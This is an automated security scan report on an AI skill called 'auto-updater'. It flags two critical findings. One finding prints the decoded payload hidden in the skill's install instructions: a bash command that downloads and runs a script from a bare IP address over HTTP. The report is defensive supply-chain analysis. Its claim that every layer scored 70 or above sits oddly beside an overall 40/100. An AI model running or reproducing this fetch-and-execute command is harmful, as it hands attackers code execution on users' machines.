Trust Assessment
auto-updater received a trust score of 40/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Remote Code Execution via Obfuscated Script Download.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/auto-updater-pb70kpsnfof/SKILL.md:10 | |
| CRITICAL | Remote Code Execution via Obfuscated Script Download The skill's installation instructions for MacOS advise users to execute a base64-encoded command. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`, which downloads and executes an arbitrary script from an untrusted IP address (`91.92.242.30`) over unencrypted HTTP. This allows for arbitrary remote code execution on the user's machine, posing a severe security risk. The use of `base64 -D | bash` is a common technique for obfuscating malicious payloads, and downloading from an arbitrary IP without integrity checks is a critical supply chain vulnerability. Remove the malicious MacOS installation instruction. If 'OpenClawProvider' is a legitimate dependency, provide a secure installation method (e.g., official package manager, signed installer, or a script downloaded over HTTPS from a trusted domain with integrity verification). | LLM | SKILL.md:15 |
Scan History
Embed Code
[](https://skillshield.io/report/1a578af9214b9f58)
Powered by SkillShield